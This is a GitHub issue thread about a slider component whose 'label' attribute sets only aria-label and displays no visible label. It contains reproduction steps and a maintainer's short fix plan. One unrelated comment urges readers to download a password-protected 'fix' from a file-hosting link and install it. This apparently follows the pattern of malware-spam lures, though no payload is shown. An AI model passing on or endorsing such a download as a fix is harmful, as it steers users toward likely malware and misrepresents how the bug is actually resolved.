### ISSUE TITLE
Slider: "label attribute" visibility implementation

### ISSUE THREAD

**Issue by infor-mperalta** [infor-design/enterprise-wc#2762]
**Describe the bug**
The IDS label attribute is currently not visible when being set by the user. Currently, setting this only sets the aria-label attribute.

**To Reproduce**

1. Using the example.html, add the "label" attribute in an IDS slider component
2. After editing save and run the demo app.
3. Observe that there are no visible changes with the slider component despite having a label attribute.

**Expected behavior**
A label will be shown when the ids slider has the label attribute

**Version**
latest

**Screenshots**
![image](https://github.com/user-attachments/assets/823112ce-624a-4736-9633-81191250d3f6)
![image](https://github.com/user-attachments/assets/e493efaf-579b-4153-b840-d3d2631fa115)

**Platform**
Chrome

**Additional context**

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tmcconechy** [comment]
Fix for this is:

- make label actually show a lable
- add ariaLabel (its current use)
